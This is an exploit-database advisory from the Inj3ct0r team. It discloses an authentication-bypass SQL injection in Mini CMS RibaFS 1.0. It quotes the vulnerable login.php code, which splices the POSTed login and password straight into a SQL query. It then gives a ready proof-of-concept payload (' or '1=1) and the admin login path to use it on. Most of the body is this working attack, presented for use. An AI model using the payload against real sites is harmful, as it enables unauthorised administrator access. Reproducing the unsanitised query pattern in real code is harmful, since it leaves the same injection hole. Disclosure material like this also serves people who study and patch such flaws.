============================================================= Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability ============================================================= [+] Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__`\/\ \__/'__`\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1######################################1 0I'm cr4wl3rmember from Inj3ct0r Team1 1######################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered by: cr4wl3r [+] My id: http://inj3ct0r.com/author/945 [+] Original: http://inj3ct0r.com/exploits/9667 [+] Download : http://code.google.com/p/minicmsribafs/downloads/list [+] Code [login.php] if (isset($_POST['login'])) { include_once("./../conexao.inc.php"); $login=$_POST['login']; $senha=$_POST['senha']; $senha=md5($senha); $sql=" SELECT * FROM usuarios WHERE login ='$login' AND senha = '$senha' "; $qry= mysql_query($sql); [+] PoC: [path]/admin/login.php Auth Bypass : ' or '1=1 [+] Greetz: All member inj3ct0r.com # Inj3ct0r.com [2010-03-22]
体验盒子
